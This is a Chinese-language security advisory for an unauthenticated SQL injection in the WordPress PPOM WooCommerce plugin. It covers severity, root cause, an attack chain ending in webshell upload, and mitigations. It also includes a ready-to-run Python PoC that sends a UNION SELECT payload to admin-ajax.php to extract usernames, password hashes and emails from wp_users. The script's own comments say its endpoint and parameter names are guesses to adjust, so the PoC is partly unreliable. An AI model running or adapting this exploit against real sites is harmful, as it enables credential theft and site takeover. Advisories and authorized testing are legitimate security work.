CVE-2025-11691：WordPress PPOM插件SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-11691

漏洞类型

SQL注入

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

PPOM – Product Addons & Custom Fields for WooCommerce (WordPress插件)

漏洞概述

CVE-2025-11691是WordPress平台上一款广受欢迎的WooCommerce产品附加组件插件PPOM（Product Addons & Custom Fields for WooCommerce）中存在的一个高危SQL注入漏洞。该漏洞由Wordfence安全团队的安全研究员发现并报告，CVSS评分为7.5，属于高危级别。

该漏洞存在于插件的PPOM_Meta::get_fields_by_id()函数中，影响该插件所有33.0.15及以下版本。由于插件开发者在处理用户输入参数时未进行充分的转义处理，且在构建SQL查询时未使用参数化查询或预编译语句，导致攻击者可以在现有SQL查询中注入额外的恶意SQL语句。

该漏洞的危险性在于其无需任何身份认证即可被利用（PR:N），攻击者可以通过网络远程发起攻击（AV:N），且无需用户交互（UI:N）。一旦成功利用，攻击者可以从数据库中提取敏感信息，如用户凭证、个人信息、订单数据等。虽然该漏洞对完整性和可用性没有直接影响（C:H/I:N/A:N），但机密性影响为高，数据库中的所有信息都可能面临泄露风险。值得注意的是，该漏洞仅在管理员启用了"Enable Legacy Price Calculations"（启用旧版价格计算）设置时才可被利用。

技术细节

该SQL注入漏洞的根本原因在于PPOM_Meta::get_fields_by_id()函数中对用户提供的参数处理不当。具体技术细节如下：

1. **漏洞函数位置**：PPOM_Meta::get_fields_by_id()，位于classes/ppom.class.php文件的第337行附近。

2. **漏洞原理**：在构建SQL查询时，开发者直接将用户控制的输入参数拼接到SQL语句中，而没有使用WordPress推荐的$wpdb->prepare()方法进行参数化处理，也没有对输入进行适当的转义（如使用esc_sql()或$wpdb->esc_like()）。这使得攻击者可以通过精心构造的输入，在SQL查询中注入恶意代码片段。

3. **利用方式**：攻击者可以通过HTTP请求向受影响网站发送包含恶意SQL片段的参数。由于插件未对输入进行过滤和转义，恶意SQL代码会被直接拼接到原始查询中执行。攻击者可以利用UNION SELECT等技术从数据库中提取任意数据。

4. **利用前提条件**：管理员必须在插件设置中启用"Enable Legacy Price Calculations"（启用旧版价格计算）选项，否则相关代码路径不会被触发。

5. **攻击影响**：利用此漏洞，攻击者可以执行以下操作：
- 提取WordPress用户表（wp_users）中的用户名和密码哈希
- 读取订单、客户等敏感业务数据
- 通过提取的管理员凭证登录后台，进一步控制整个网站

6. **修复方式**：开发者已在后续版本中通过使用$wpdb->prepare()进行参数化查询来修复此漏洞。

攻击链分析

STEP 1

步骤1：信息收集

攻击者使用自动化工具（如WPScan）扫描目标WordPress网站，识别是否安装了PPOM插件及其版本号。

STEP 2

步骤2：确认漏洞条件

攻击者检查目标网站是否启用了"Enable Legacy Price Calculations"设置，该设置是漏洞利用的前提条件。

STEP 3

步骤3：构造恶意请求

攻击者构造包含恶意SQL片段的HTTP请求，通过UNION SELECT等技术在参数中注入SQL代码。

STEP 4

步骤4：发送注入请求

攻击者通过POST请求向/admin-ajax.php等端点发送恶意数据，触发PPOM_Meta::get_fields_by_id()函数中的漏洞。

STEP 5

步骤5：提取敏感数据

成功利用后，攻击者从数据库中提取管理员凭证、用户信息、订单数据等敏感信息。

STEP 6

步骤6：进一步渗透

利用获取的管理员凭证登录WordPress后台，上传WebShell或执行其他恶意操作，完全控制网站。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11691 - PPOM WooCommerce SQL Injection PoC
# Vulnerability: Unauthenticated SQL Injection via PPOM_Meta::get_fields_by_id()
# Affected: PPOM Plugin <= 33.0.15 (when "Enable Legacy Price Calculations" is enabled)

import requests
import sys

TARGET_URL = "http://target-wordpress-site.com"

def exploit_sqli(target_url):
    """
    Exploit SQL Injection in PPOM plugin's get_fields_by_id() function.
    The vulnerable parameter is passed via POST/GET and concatenated
    directly into SQL query without proper escaping or prepared statements.
    """

    # The injection point is in the field ID parameter
    # Example payload using UNION-based SQL injection to extract data
    injection_payload = (
        "1 UNION SELECT user_login,user_pass,user_email,1,1,1,1,1,1,1,1,1,1,1,1,1 "
        "FROM wp_users WHERE ID=1-- -"
    )

    # Endpoint that triggers the vulnerable function
    # Adjust based on actual application routes
    exploit_url = f"{target_url}/wp-admin/admin-ajax.php"

    # Data parameters that trigger the vulnerable code path
    data = {
        "action": "ppom_get_fields",
        "ppom_id": injection_payload,
    }

    try:
        response = requests.post(exploit_url, data=data, timeout=10)

        if response.status_code == 200:
            print(f"[+] Response received ({len(response.text)} bytes)")
            # Extract sensitive data from response
            if "admin" in response.text or "$" in response.text:
                print("[+] Potential sensitive data found in response")
                print(response.text[:500])
            return response.text
        else:
            print(f"[-] Request failed with status: {response.status_code}")
            return None

    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None

def check_vulnerability(target_url):
    """Check if the target is vulnerable by testing with a benign payload."""
    test_payload = "1' AND '1'='1"
    normal_payload = "1"

    exploit_url = f"{target_url}/wp-admin/admin-ajax.php"

    # Test with normal input
    r1 = requests.post(exploit_url, data={
        "action": "ppom_get_fields",
        "ppom_id": normal_payload
    })

    # Test with injection payload
    r2 = requests.post(exploit_url, data={
        "action": "ppom_get_fields",
        "ppom_id": test_payload
    })

    if r1.status_code == 200 and r2.status_code == 500:
        print("[+] Target appears to be VULNERABLE to SQL Injection")
        return True
    else:
        print("[-] Target does not appear to be vulnerable")
        return False

if __name__ == "__main__":
    if len(sys.argv) > 1:
        TARGET_URL = sys.argv[1]

    print(f"[*] Testing target: {TARGET_URL}")
    if check_vulnerability(TARGET_URL):
        print("[*] Attempting exploitation...")
        exploit_sqli(TARGET_URL)

影响范围

PPOM – Product Addons & Custom Fields for WooCommerce <= 33.0.15

防御指南

临时缓解措施

在无法立即升级插件的情况下，建议采取以下临时缓解措施：1）登录WordPress后台，进入PPOM插件设置，禁用"Enable Legacy Price Calculations"（启用旧版价格计算）选项，这是阻止漏洞被利用的最直接方法；2）通过.htaccess文件或WAF规则限制对/admin-ajax.php的访问，仅允许来自可信IP的请求；3）部署Web应用防火墙规则，过滤包含UNION、SELECT等SQL关键字的可疑请求；4）监控数据库日志，检测异常的SQL查询行为；5）尽快升级插件到官方修复版本以彻底消除漏洞。